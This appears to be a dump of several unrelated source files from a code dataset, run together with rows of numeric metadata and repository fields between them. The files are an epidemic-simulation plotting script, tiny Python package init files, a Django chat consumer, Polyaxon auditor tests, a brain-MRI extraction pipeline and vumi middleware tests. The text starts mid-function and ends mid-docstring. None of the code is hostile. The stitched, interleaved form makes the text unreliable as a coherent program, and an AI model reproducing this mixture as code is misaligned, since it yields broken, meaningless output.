peak_heights_3[i,:], peak_heights_sd_3[i,:], peak_heights_1[i,:], peak_heights_sd_1[i,:], color=colors[n_Cs + i], mccount=mc_iterations, p=95) l2 = ax2.plot(p_is, period_prevalences_2[i,:] / period_prevalences_1[i,:], color=colors[i], linestyle=linestyle, zorder=1) estimateQuotientCI(ax2, p_is, period_prevalences_2[i,:], period_prevalences_sd_2[i,:], period_prevalences_1[i,:], period_prevalences_sd_1[i,:], color=colors[i], mccount=mc_iterations, p=95) l4 = ax4.plot(p_is, period_prevalences_3[i,:] / period_prevalences_1[i,:], color=colors[n_Cs + i], linestyle=linestyle, zorder=1) estimateQuotientCI(ax4, p_is, period_prevalences_3[i,:], period_prevalences_sd_3[i,:], period_prevalences_1[i,:], period_prevalences_sd_1[i,:], color=colors[n_Cs + i], mccount=mc_iterations, p=95) line_artists[i] = l1[0] line_artists[n_Cs + i] = l3[0] labels1 = list(['quar.: $C(g)$={:.2f}'.format(val) for val in Cs]) labels2 = list(['trac.: $C(g)$={:.2f}'.format(val) for val in Cs]) # line_labels = [None,]*2*n_p_i # line_labels[::2] = labels1 # line_labels[1::2] = labels2 line_labels = labels1 + labels2 fig.legend(handles=line_artists, # The line objects labels=line_labels, # The labels for each line loc="center", # Position of legend bbox_to_anchor=(0.5, -0.1), borderaxespad=0.1, # Small spacing around legend box ncol=2 ) plt.subplots_adjust(bottom=0.01) # ax1.legend(['$p_i$=' + str(val) for val in p_is],loc='upper center', bbox_to_anchor=(0.5, -0.25), ncol=3) # looks bad # ax2.legend(['$p_i$=' + str(val) for val in p_is],bbox_to_anchor=(0., 1.02, 1., .102), loc='lower left',ncol=3, mode="expand") # looks worse # ax3.legend(['$p_i$=' + str(val) for val in p_is], loc='upper center', bbox_to_anchor=(0.5, -0.25),fancybox=True, shadow=True, ncol=3) # # left upper axis for dispersion values # ax_upper_axis = axul.twiny() # ax_upper_axis.set_xlim(axul.get_xlim()) # ax_upper_axis.set_xticks(Cs) # ax_upper_axis.set_xticklabels(["{:.2f}".format(a) for a in achieved_disps.mean(axis=0)]) # ax_upper_axis.set_xlabel('D(g)') # # # right upper axis for dispersion values # ax_upper_axis = axur.twiny() # ax_upper_axis.set_xlim(axul.get_xlim()) # ax_upper_axis.set_xticks(Cs) # ax_upper_axis.set_xticklabels(["{:.2f}".format(a) for a in achieved_disps.mean(axis=0)]) # ax_upper_axis.set_xlabel('D(g)') # ax2.plot(Cs, peak_heights_2, 'C1') # ax2.plot(Cs, peak_heights_3, 'C2') # ax2.set_ylabel('Scaled peak height') # # ax2.plot(Cs, peak_heights_2, 'C1') # ax2.plot(Cs, peak_heights_3, 'C2') # ax2.set_ylabel('Scaled peak height') # # ax3.plot(Cs, period_prevalences_2, 'C1') # ax3.plot(Cs, period_prevalences_3, 'C2') # ax3.set_ylabel('Scaled period prevalence') # ax3.set_xlabel('C(g)') # # labels = [interval[0],] + list(['' for i in range(len(ps)-2)]) + [interval[1],] # ax3.set_xticks(Cs, minor=False) # ax3.xaxis.set_major_formatter(FormatStrFormatter('%.3f')) # # # ax_upper_axis = ax2.twiny() # # ax_upper_axis.set_xlim(ax3.get_xlim()) # ax_upper_axis.set_xticks(Cs) # ax_upper_axis.set_xticklabels(["{:.3f}".format(a) for a in achieved_disps.mean(axis=0)]) # # ax_upper_axis.xaxis.set_major_formatter(FormatStrFormatter('%.3f')) # ax_upper_axis.set_xlabel('D(g)') # # # plt.xticks([interval[0],interval[1]]) # ax3.legend(['Quarantine', 'Tracing']) plt.tight_layout() parent = os.path.dirname(path) fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_C{}_comp_corrected_flipped'.format( n, str(interval[0]) + 'to' + str(interval[1])) + '.pdf'), bbox_inches='tight', pad_inches=0) return out def vary_C_comp_epcurves(res, n, p, p_i, mc_iterations, max_t, interval, seed=0, force_recompute=False, path=None): # measure effect of clustering coeff on tracing effectiveness. Here we scale according to the vanilla outcome # res parameter defines how many points on [0,1] are used Cs = np.linspace(interval[0], interval[1], endpoint=True, num=res) # the following two variables save the actual values that were achieved by the heuristic. # In theory, these should be approximately the same in each net achieved_clusterings = np.zeros((3, res)) achieved_disps = np.zeros((3, res)) # set up the plots # fig, axes = plt.subplots(1, 4, figsize=(8*scale, 4*scale),gridspec_kw={'width_ratios': [5,5,5,0.3]}, dpi=1000) fig = plt.figure(figsize=(columwidth, columwidth)) rows = 3 columns = 2 grid = fig.add_gridspec(rows, columns, wspace=.25, hspace=.35, width_ratios=[10, 0.4]) # plt.subplot(grid[0, :]) # plt.annotate('sub1', xy = (0.5, -0.5), va = 'center', ha = 'center', weight='bold', fontsize = 15) # plt.plot(x, y) # # plt.subplot(grid[1, 0]) # plt.annotate('sub2', xy = (0.5, -0.5), va = 'center', ha = 'center', weight='bold', fontsize = 15) # plt.plot(x, y) # # plt.subplot(grid[1, 1]) # plt.annotate('sub3', xy = (0.5, -0.5), va = 'center', ha = 'center', weight='bold', fontsize = 15) # plt.plot(x, y) # # plt.subplot(grid[1, 2]) # plt.annotate('sub4', xy = (0.5, -0.5), va = 'center', ha = 'center', weight='bold', fontsize = 15) # plt.plot(x, y) # plt.show() ax1 = fig.add_subplot(grid[0, 0]) ax2 = fig.add_subplot(grid[1, 0]) ax3 = fig.add_subplot(grid[2, 0]) cbar_ax = fig.add_subplot(grid[:, 1]) # ax1, ax2, ax3, cbar_ax = axes ax1.set_ylabel('Infected') ax2.set_ylabel('Infected') ax3.set_ylabel('Infected') ax1.set_xlabel('t') ax2.set_xlabel('t') ax3.set_xlabel('t') # cbar_ax.axis('off') norm = matplotlib.colors.Normalize(vmin=Cs[0], vmax=Cs[-1], clip=False) cmap = plt.cm.jet cb1 = mpl.colorbar.ColorbarBase(cbar_ax, cmap=cmap, norm=norm, orientation='vertical') cbar_ax.set_ylabel('C(g)') # set up colorcycles # color = plt.cm.viridis(Cs) # norm = mpl.colors.Normalize(vmin=Cs[0], vmax=Cs[-1]) # fig.colorbar(plt.cm.ScalarMappable(norm=norm, cmap=color), ax=ax1) # fig.colorbar(plt.cm.ScalarMappable(norm=norm, cmap=color), ax=ax2) # fig.colorbar(plt.cm.ScalarMappable(norm=norm, cmap=color), ax=ax3) # color.cycle_cmap(res) # mpl.rcParams['axes.prop_cycle'] = cycler.cycler('color', color) # ax3.legend(list(['C = '+ str(C) for C in Cs])) # vanilla peak_times_1 = np.ndarray(res) peak_heights_1 = np.ndarray(res) period_prevalences_1 = np.ndarray(res) unsuccessful_flags_1 = [] for i, C in tqdm(enumerate(Cs), desc='Vanilla', total=res): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i, mode='vanilla', force_recompute=force_recompute, path=path, clustering=C) peak_times_1[i] = t_peak peak_heights_1[i] = mean_peak period_prevalences_1[i] = mean_prevalence achieved_clusterings[0, i] = achieved_clustering achieved_disps[0, i] = achieved_disp # epidemiological curve ax1.plot(mean_counts[2, :], color=cmap(norm(C)), linewidth=0.75) # quarantine peak_times_2 = np.ndarray(res) peak_heights_2 = np.ndarray(res) period_prevalences_2 = np.ndarray(res) unsuccessful_flags_2 = [] for i, C in tqdm(enumerate(Cs), desc='Quarantine', total=res): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + res, mode='quarantine', force_recompute=force_recompute, path=path, clustering=C) peak_times_2[i] = t_peak peak_heights_2[i] = mean_peak / peak_heights_1[i] period_prevalences_2[i] = mean_prevalence / period_prevalences_1[i] achieved_clusterings[1, i] = achieved_clustering achieved_disps[1, i] = achieved_disp # epidemiological curve ax2.plot(mean_counts[2, :], color=cmap(norm(C)), linewidth=0.75) # tracing peak_times_3 = np.ndarray(res) peak_heights_3 = np.ndarray(res) period_prevalences_3 = np.ndarray(res) unsuccessful_flags_3 = [] for i, C in tqdm(enumerate(Cs), desc='Tracing', total=res): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, 2 * mc_iterations, max_t, seed=seed + i + 2 * res, mode='tracing', force_recompute=force_recompute, path=path, clustering=C) peak_times_3[i] = t_peak peak_heights_3[i] = mean_peak / peak_heights_1[i] period_prevalences_3[i] = mean_prevalence / period_prevalences_1[i] achieved_clusterings[2, i] = achieved_clustering achieved_disps[2, i] = achieved_disp # epidemiological curve ax3.plot(mean_counts[2, :], color=cmap(norm(C)), linewidth=0.75) parent = os.path.dirname(path) dirname_parent = os.path.dirname(__file__) dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache') id_params = ( n, p, p_i, mc_iterations, max_t, interval, seed, t_i, t_c, t_r, t_d, t_t, p_q, p_t, quarantine_time, resolution, epsilon_clustering) # normal hashes are salted between runs -> use something that is persistent tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest()) with open(os.path.join(dirname, tag + '_metrics_corrected.p'), 'wb') as f: out = [Cs, unsuccessful_flags_1, peak_times_1, peak_heights_1, period_prevalences_1, Cs, unsuccessful_flags_2, peak_times_2, peak_heights_2, period_prevalences_2, Cs, unsuccessful_flags_3, peak_times_3, peak_heights_3, period_prevalences_3, achieved_clusterings, achieved_disps] pickle.dump(out, f) # plt.tight_layout() fig.align_ylabels() fig.savefig(os.path.join(dirname_parent, 'Experiments', 'Paper', 'Pics', 'Cvaried_n{}_C{}_comp_epcurves'.format( n, str(interval[0]) + 'to' + str(interval[1])) + '.pdf'), bbox_inches='tight') return out if __name__ == '__main__': res = 20 n = 500 p = 0.1 p_i = 0.5 mc_iterations = 50 max_t = 200 path = r'C:\Users\giglerf\Google Drive\Seminar_Networks\Experiments\vary_params' vary_p(res=res, n=n, p_i=p_i, mc_iterations=mc_iterations, max_t=max_t, force_recompute=False, path=path) vary_p(res=res, n=n, p_i=p_i, mc_iterations=mc_iterations, max_t=max_t, mode='quarantine', force_recompute=False, path=path) vary_p(res=res, n=n, p_i=p_i, mc_iterations=mc_iterations, max_t=max_t, mode='tracing', force_recompute=False, path=path) vary_p_i(res=res, n=n, p=p, mc_iterations=mc_iterations, max_t=max_t, force_recompute=False, path=path) vary_p_i(res=res, n=n, p=p, mc_iterations=mc_iterations, max_t=max_t, mode='quarantine', force_recompute=False, path=path) vary_p_i(res=res, n=n, p=p, mc_iterations=mc_iterations, max_t=max_t, mode='tracing', force_recompute=False, path=path) # vary_p(res=3,n=100,p_i=0.5, mc_iterations=1, max_t=20 path = r'C:\Users\giglerf\Google Drive\Seminar_Networks\Experiments\vary_params')
43.42245
153
0.630026
10,297
71,951
4.154414
0.059241
0.043714
0.029454
0.017579
0.88424
0.862032
0.845481
0.839964
0.830544
0.819183
0
0.024974
0.239246
71,951
1,656
154
43.448672
0.756545
0.326889
0
0.615925
0
0
0.052072
0.003947
0
0
0
0.000604
0.015222
1
0.012881
false
0
0.016393
0
0.037471
0.008197
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
74d177778420438ff2eca413f2fefcfb8e7d85fb
43
py
Python
modelexp/__init__.py
DomiDre/modelexp
1ec25f71e739dac27716f9a8637fa6ab067499b9
[ "MIT" ]
null
null
null
modelexp/__init__.py
DomiDre/modelexp
1ec25f71e739dac27716f9a8637fa6ab067499b9
[ "MIT" ]
null
null
null
modelexp/__init__.py
DomiDre/modelexp
1ec25f71e739dac27716f9a8637fa6ab067499b9
[ "MIT" ]
null
null
null
from ._app import App from ._cli import Cli
21.5
21
0.790698
8
43
4
0.5
0
0
0
0
0
0
0
0
0
0
0
0.162791
43
2
22
21.5
0.888889
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
74ec24e9c8e87181d24709864b41d8c1ddcf4e40
37
py
Python
schicluster/impute/__init__.py
zhoujt1994/HiCluster
ee7431c33d8b565cd8b92b633e6f79b2267c1535
[ "MIT" ]
null
null
null
schicluster/impute/__init__.py
zhoujt1994/HiCluster
ee7431c33d8b565cd8b92b633e6f79b2267c1535
[ "MIT" ]
null
null
null
schicluster/impute/__init__.py
zhoujt1994/HiCluster
ee7431c33d8b565cd8b92b633e6f79b2267c1535
[ "MIT" ]
null
null
null
from .snakemake import prepare_impute
37
37
0.891892
5
37
6.4
1
0
0
0
0
0
0
0
0
0
0
0
0.081081
37
1
37
37
0.941176
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2d198a2f244324ff0128838b9a5ae9d9ce102ecd
143
py
Python
src/dicomweb_client/__init__.py
michaelloewenstein/dicomweb-client
0ea37db68a2b9c8373c964e610acea945b7b07b7
[ "MIT" ]
null
null
null
src/dicomweb_client/__init__.py
michaelloewenstein/dicomweb-client
0ea37db68a2b9c8373c964e610acea945b7b07b7
[ "MIT" ]
null
null
null
src/dicomweb_client/__init__.py
michaelloewenstein/dicomweb-client
0ea37db68a2b9c8373c964e610acea945b7b07b7
[ "MIT" ]
null
null
null
__version__ = '0.52.0' from dicomweb_client.api import DICOMwebClient # noqa from dicomweb_client.uri import URI, URISuffix, URIType # noqa
28.6
63
0.783217
20
143
5.3
0.65
0.226415
0.339623
0
0
0
0
0
0
0
0
0.03252
0.13986
143
4
64
35.75
0.829268
0.062937
0
0
0
0
0.045802
0
0
0
0
0
0
1
0
false
0
0.666667
0
0.666667
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
6
740fe8cbb416d0ab36b1379f3546e419288814df
97
py
Python
__init__.py
joeliu1985/learnseldom
759c30bdd60bad8877f6f156536d7158d861cb95
[ "Apache-2.0" ]
359
2020-08-15T12:36:42.000Z
2022-03-31T03:07:06.000Z
__init__.py
liumengjia/UIAutoDemo
a7d7fecf37045357bdc2a98371edc5f8b15bc50a
[ "Apache-2.0" ]
6
2020-10-15T12:06:23.000Z
2021-07-01T03:28:55.000Z
__init__.py
liumengjia/UIAutoDemo
a7d7fecf37045357bdc2a98371edc5f8b15bc50a
[ "Apache-2.0" ]
63
2020-08-16T00:52:21.000Z
2022-03-15T13:35:22.000Z
""" 更新时间:2020-08-27 版本说明: 1、seldom:1.6.0 2、poium:0.6.3 3、Python:3.7.4 """
13.857143
22
0.463918
20
97
2.25
0.75
0
0
0
0
0
0
0
0
0
0
0.298507
0.309278
97
7
23
13.857143
0.373134
0.917526
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
7411749e416475591e8cc5ecaa9729e38a18a59a
360
py
Python
apps/chat/consumers.py
SeniorDev34/Django_React_Chat
5234fd14e65902e06a8bb14eae5e411798ddece9
[ "BSD-3-Clause" ]
58
2016-09-26T14:30:14.000Z
2022-02-15T21:38:32.000Z
apps/chat/consumers.py
Webdev889/Django_React_Chat
5234fd14e65902e06a8bb14eae5e411798ddece9
[ "BSD-3-Clause" ]
1
2020-06-05T20:31:09.000Z
2020-06-05T20:31:09.000Z
apps/chat/consumers.py
Webdev889/Django_React_Chat
5234fd14e65902e06a8bb14eae5e411798ddece9
[ "BSD-3-Clause" ]
15
2016-09-26T14:38:24.000Z
2020-03-30T12:00:06.000Z
from channels.sessions import channel_session from .engine import ChatEngine @channel_session def ws_connect(message): # TODO Move many LOGIN_USER actions from ws_message into ws_add pass @channel_session def ws_message(message): ChatEngine.dispatch(message) @channel_session def ws_disconnect(message): ChatEngine(message).disconnect()
18
67
0.788889
47
360
5.829787
0.489362
0.20438
0.186131
0.208029
0
0
0
0
0
0
0
0
0.147222
360
19
68
18.947368
0.892508
0.169444
0
0.272727
0
0
0
0
0
0
0
0.052632
0
1
0.272727
false
0.090909
0.181818
0
0.454545
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
1
0
1
0
0
0
0
0
6
7421110cf1ee2b53032b9a766c6c2971fc7e112a
4,657
py
Python
tests/test_auditor/test_auditor_notebook.py
elyase/polyaxon
1c19f059a010a6889e2b7ea340715b2bcfa382a0
[ "MIT" ]
null
null
null
tests/test_auditor/test_auditor_notebook.py
elyase/polyaxon
1c19f059a010a6889e2b7ea340715b2bcfa382a0
[ "MIT" ]
null
null
null
tests/test_auditor/test_auditor_notebook.py
elyase/polyaxon
1c19f059a010a6889e2b7ea340715b2bcfa382a0
[ "MIT" ]
null
null
null
# pylint:disable=ungrouped-imports from unittest.mock import patch import pytest import activitylogs import auditor import tracker from event_manager.events import notebook as notebook_events from factories.factory_plugins import NotebookJobFactory from factories.factory_projects import ProjectFactory from tests.utils import BaseTest @pytest.mark.auditor_mark class AuditorNotebookTest(BaseTest): """Testing subscribed events""" DISABLE_RUNNER = True def setUp(self): self.notebook = NotebookJobFactory(project=ProjectFactory()) auditor.validate() auditor.setup() tracker.validate() tracker.setup() activitylogs.validate() activitylogs.setup() super().setUp() @patch('tracker.service.TrackerService.record_event') @patch('activitylogs.service.ActivityLogService.record_event') def test_notebook_started(self, activitylogs_record, tracker_record): auditor.record(event_type=notebook_events.NOTEBOOK_STARTED, instance=self.notebook, target='project') assert tracker_record.call_count == 1 assert activitylogs_record.call_count == 0 @patch('tracker.service.TrackerService.record_event') @patch('activitylogs.service.ActivityLogService.record_event') def test_notebook_started_triggered(self, activitylogs_record, tracker_record): auditor.record(event_type=notebook_events.NOTEBOOK_STARTED_TRIGGERED, instance=self.notebook, target='project', actor_id=1, actor_name='foo') assert tracker_record.call_count == 1 assert activitylogs_record.call_count == 1 @patch('tracker.service.TrackerService.record_event') @patch('activitylogs.service.ActivityLogService.record_event') def test_notebook_stopped(self, activitylogs_record, tracker_record): auditor.record(event_type=notebook_events.NOTEBOOK_STOPPED, instance=self.notebook, target='project') assert tracker_record.call_count == 1 assert activitylogs_record.call_count == 0 @patch('tracker.service.TrackerService.record_event') @patch('activitylogs.service.ActivityLogService.record_event') def test_notebook_stopped_triggered(self, activitylogs_record, tracker_record): auditor.record(event_type=notebook_events.NOTEBOOK_STOPPED_TRIGGERED, instance=self.notebook, target='project', actor_id=1, actor_name='foo') assert tracker_record.call_count == 1 assert activitylogs_record.call_count == 1 @patch('tracker.service.TrackerService.record_event') @patch('activitylogs.service.ActivityLogService.record_event') def test_notebook_viewed(self, activitylogs_record, tracker_record): auditor.record(event_type=notebook_events.NOTEBOOK_VIEWED, instance=self.notebook, target='project', actor_id=1, actor_name='foo') assert tracker_record.call_count == 1 assert activitylogs_record.call_count == 1 @patch('tracker.service.TrackerService.record_event') @patch('activitylogs.service.ActivityLogService.record_event') def test_experiment_new_status(self, activitylogs_record, tracker_record): auditor.record(event_type=notebook_events.NOTEBOOK_NEW_STATUS, instance=self.notebook, target='project') assert tracker_record.call_count == 1 assert activitylogs_record.call_count == 0 @patch('tracker.service.TrackerService.record_event') @patch('activitylogs.service.ActivityLogService.record_event') def test_experiment_failed(self, activitylogs_record, tracker_record): auditor.record(event_type=notebook_events.NOTEBOOK_FAILED, instance=self.notebook, target='project') assert tracker_record.call_count == 1 assert activitylogs_record.call_count == 0 @patch('tracker.service.TrackerService.record_event') @patch('activitylogs.service.ActivityLogService.record_event') def test_experiment_succeeded(self, activitylogs_record, tracker_record): auditor.record(event_type=notebook_events.NOTEBOOK_SUCCEEDED, instance=self.notebook, target='project') assert tracker_record.call_count == 1 assert activitylogs_record.call_count == 0
39.803419
83
0.683702
470
4,657
6.514894
0.140426
0.086218
0.07838
0.057479
0.801437
0.801437
0.801437
0.801437
0.801437
0.801437
0
0.005324
0.233627
4,657
116
84
40.146552
0.85262
0.012669
0
0.593407
0
0
0.17966
0.165505
0
0
0
0
0.175824
1
0.098901
false
0
0.098901
0
0.21978
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
742264cd4616cf3ba21074ffcf7f198ab86e0ed1
6,231
py
Python
macapype/pipelines/extract_brain.py
Macatools/macapype
50820e2ab948c91c5362771d51688edd09b72499
[ "BSD-3-Clause" ]
7
2020-07-04T04:04:03.000Z
2022-03-24T14:35:45.000Z
macapype/pipelines/extract_brain.py
Macatools/macapype
50820e2ab948c91c5362771d51688edd09b72499
[ "BSD-3-Clause" ]
95
2020-01-02T16:41:20.000Z
2021-12-07T15:50:41.000Z
macapype/pipelines/extract_brain.py
Macatools/macapype
50820e2ab948c91c5362771d51688edd09b72499
[ "BSD-3-Clause" ]
9
2019-11-14T12:46:14.000Z
2022-01-26T09:44:21.000Z
""" Pipelines for brain extraction """ import nipype.interfaces.utility as niu import nipype.pipeline.engine as pe from nipype.interfaces import ants import nipype.interfaces.fsl as fsl import nipype.interfaces.afni as afni from ..nodes.extract_brain import AtlasBREX from ..utils.utils_nodes import NodeParams, parse_key def create_extract_pipe(params_template, params={}, name="extract_pipe"): """ Description: Extract T1 brain using AtlasBrex Params: - norm_intensity (see `N4BiasFieldCorrection <https://nipype.readthedocs\ .io/en/0.12.1/interfaces/generated/nipype.interfaces.ants.segmentation.\ html#n4biasfieldcorrection>`_ for arguments) - atlas_brex (see :class:`AtlasBREX \ <macapype.nodes.extract_brain.AtlasBREX>` for arguments) - also \ available as :ref:`indiv_params <indiv_params>` Inputs: inputnode: restore_T1: preprocessed (debiased/denoised) T1 file name restore_T2: preprocessed (debiased/denoised)T2 file name arguments: params_template: dictionary of info about template params: dictionary of node sub-parameters (from a json file) name: pipeline name (default = "extract_pipe") Outputs: smooth_mask.out_file: Computed mask (after some smoothing) """ # creating pipeline extract_pipe = pe.Workflow(name=name) # creating inputnode inputnode = pe.Node( niu.IdentityInterface(fields=['restore_T1', 'restore_T2', "indiv_params"]), name='inputnode') # atlas_brex atlas_brex = NodeParams(AtlasBREX(), params=parse_key(params, "atlas_brex"), name='atlas_brex') extract_pipe.connect(inputnode, "restore_T1", atlas_brex, 't1_restored_file') atlas_brex.inputs.NMT_file = params_template["template_head"] atlas_brex.inputs.NMT_SS_file = params_template["template_brain"] extract_pipe.connect( inputnode, ("indiv_params", parse_key, "atlas_brex"), atlas_brex, 'indiv_params') # mask_brex mask_brex = pe.Node(fsl.UnaryMaths(), name='mask_brex') mask_brex.inputs.operation = 'bin' extract_pipe.connect(atlas_brex, 'brain_file', mask_brex, 'in_file') # smooth_mask smooth_mask = pe.Node(fsl.UnaryMaths(), name='smooth_mask') smooth_mask.inputs.operation = "bin" smooth_mask.inputs.args = "-s 1 -thr 0.5 -bin" extract_pipe.connect(mask_brex, 'out_file', smooth_mask, 'in_file') # mult_T1 mult_T1 = pe.Node(afni.Calc(), name='mult_T1') mult_T1.inputs.expr = "a*b" mult_T1.inputs.outputtype = 'NIFTI_GZ' extract_pipe.connect(inputnode, "restore_T1", mult_T1, 'in_file_a') extract_pipe.connect(smooth_mask, 'out_file', mult_T1, 'in_file_b') # mult_T2 mult_T2 = pe.Node(afni.Calc(), name='mult_T2') mult_T2.inputs.expr = "a*b" mult_T2.inputs.outputtype = 'NIFTI_GZ' extract_pipe.connect(inputnode, 'restore_T2', mult_T2, 'in_file_a') extract_pipe.connect(smooth_mask, 'out_file', mult_T2, 'in_file_b') return extract_pipe def create_extract_T1_pipe(params_template, params={}, name="extract_T1_pipe"): """ Description: Extract T1 brain using AtlasBrex Params: - norm_intensity (see `N4BiasFieldCorrection <https://nipype.readthedocs.\ io/en/0.12.1/interfaces/generated/nipype.interfaces.ants.segmentation.html\ #n4biasfieldcorrection>`_ for arguments) - atlas_brex (see :class:`AtlasBREX \ <macapype.nodes.extract_brain.AtlasBREX>` for arguments) - also available \ as :ref:`indiv_params <indiv_params>` Inputs: inputnode: restore_T1: preprocessed (debiased/denoised) T1 file name arguments: params_template: dictionary of info about template params: dictionary of node sub-parameters (from a json file) name: pipeline name (default = "extract_pipe") Outputs: smooth_mask.out_file: Computed mask (after some smoothing) """ # creating pipeline extract_pipe = pe.Workflow(name=name) # creating inputnode inputnode = pe.Node( niu.IdentityInterface(fields=['restore_T1', "indiv_params"]), name='inputnode') # N4 intensity normalization with parameters from json norm_intensity = NodeParams(ants.N4BiasFieldCorrection(), params=parse_key(params, "norm_intensity"), name='norm_intensity') extract_pipe.connect(inputnode, 'restore_T1', norm_intensity, "input_image") # atlas_brex atlas_brex = NodeParams(AtlasBREX(), params=parse_key(params, "atlas_brex"), name='atlas_brex') extract_pipe.connect(norm_intensity, "output_image", atlas_brex, 't1_restored_file') atlas_brex.inputs.NMT_file = params_template["template_head"] atlas_brex.inputs.NMT_SS_file = params_template["template_brain"] extract_pipe.connect( inputnode, ("indiv_params", parse_key, "atlas_brex"), atlas_brex, 'indiv_params') # mask_brex mask_brex = pe.Node(fsl.UnaryMaths(), name='mask_brex') mask_brex.inputs.operation = 'bin' extract_pipe.connect(atlas_brex, 'brain_file', mask_brex, 'in_file') # smooth_mask smooth_mask = pe.Node(fsl.UnaryMaths(), name='smooth_mask') smooth_mask.inputs.operation = "bin" smooth_mask.inputs.args = "-s 1 -thr 0.5 -bin" extract_pipe.connect(mask_brex, 'out_file', smooth_mask, 'in_file') # mult_T1 mult_T1 = pe.Node(afni.Calc(), name='mult_T1') mult_T1.inputs.expr = "a*b" mult_T1.inputs.outputtype = 'NIFTI_GZ' extract_pipe.connect(inputnode, 'restore_T1', mult_T1, 'in_file_a') extract_pipe.connect(smooth_mask, 'out_file', mult_T1, 'in_file_b') return extract_pipe
30.247573
79
0.640989
731
6,231
5.199726
0.154583
0.066561
0.071034
0.049724
0.837674
0.833465
0.784267
0.784267
0.784267
0.769271
0
0.013118
0.253731
6,231
205
80
30.395122
0.804301
0.319371
0
0.657895
0
0
0.168531
0
0
0
0
0
0
1
0.026316
false
0
0.092105
0
0.144737
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
745a92b2c8ad9dcb7b7a23f1c35b004d8b21958a
9,287
py
Python
vumi/middleware/tests/test_provider_setter.py
seidu626/vumi
62eae205a07029bc7ab382086715694548001876
[ "BSD-3-Clause" ]
199
2015-01-05T09:04:24.000Z
2018-08-15T17:02:49.000Z
vumi/middleware/tests/test_provider_setter.py
seidu626/vumi
62eae205a07029bc7ab382086715694548001876
[ "BSD-3-Clause" ]
187
2015-01-06T15:22:38.000Z
2018-07-14T13:15:29.000Z
vumi/middleware/tests/test_provider_setter.py
seidu626/vumi
62eae205a07029bc7ab382086715694548001876
[ "BSD-3-Clause" ]
86
2015-01-31T02:47:08.000Z
2018-12-01T11:59:47.000Z
"""Tests for vumi.middleware.provider_setter.""" from vumi.middleware.provider_setter import ( StaticProviderSettingMiddleware, AddressPrefixProviderSettingMiddleware, ProviderSettingMiddlewareError) from vumi.tests.helpers import VumiTestCase, MessageHelper class TestStaticProviderSettingMiddleware(VumiTestCase): def setUp(self): self.msg_helper = self.add_helper(MessageHelper()) def mk_middleware(self, config): dummy_worker = object() mw = StaticProviderSettingMiddleware( "static_provider_setter", config, dummy_worker) mw.setup_middleware() return mw def test_set_provider_on_inbound_if_unset(self): """ The statically configured provider value is set on inbound messages that have no provider. """ mw = self.mk_middleware({"provider": "MY-MNO"}) msg = self.msg_helper.make_inbound(None) self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_replace_provider_on_inbound_if_set(self): """ The statically configured provider value replaces any existing provider a message may already have set. """ mw = self.mk_middleware({"provider": "MY-MNO"}) msg = self.msg_helper.make_inbound(None, provider="YOUR-MNO") self.assertEqual(msg.get("provider"), "YOUR-MNO") processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_set_provider_on_outbound_if_unset(self): """ Outbound messages are left as they are. """ mw = self.mk_middleware({"provider": "MY-MNO"}) msg = self.msg_helper.make_outbound(None) self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_outbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") class TestAddressPrefixProviderSettingMiddleware(VumiTestCase): def setUp(self): self.msg_helper = self.add_helper(MessageHelper()) def mk_middleware(self, config): dummy_worker = object() mw = AddressPrefixProviderSettingMiddleware( "address_prefix_provider_setter", config, dummy_worker) mw.setup_middleware() return mw def assert_middleware_error(self, msg): [err] = self.flushLoggedErrors(ProviderSettingMiddlewareError) self.assertEqual(str(err.value), msg) def test_set_provider_unique_matching_prefix(self): """ If exactly one prefix matches the address, its corresponding provider value is set on the inbound message. """ mw = self.mk_middleware({"provider_prefixes": { "+123": "MY-MNO", "+124": "YOUR-MNO", }}) msg = self.msg_helper.make_inbound(None, from_addr="+12345") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_set_provider_longest_matching_prefix(self): """ If more than one prefix matches the address, the provider value for the longest matching prefix is set on the inbound message. 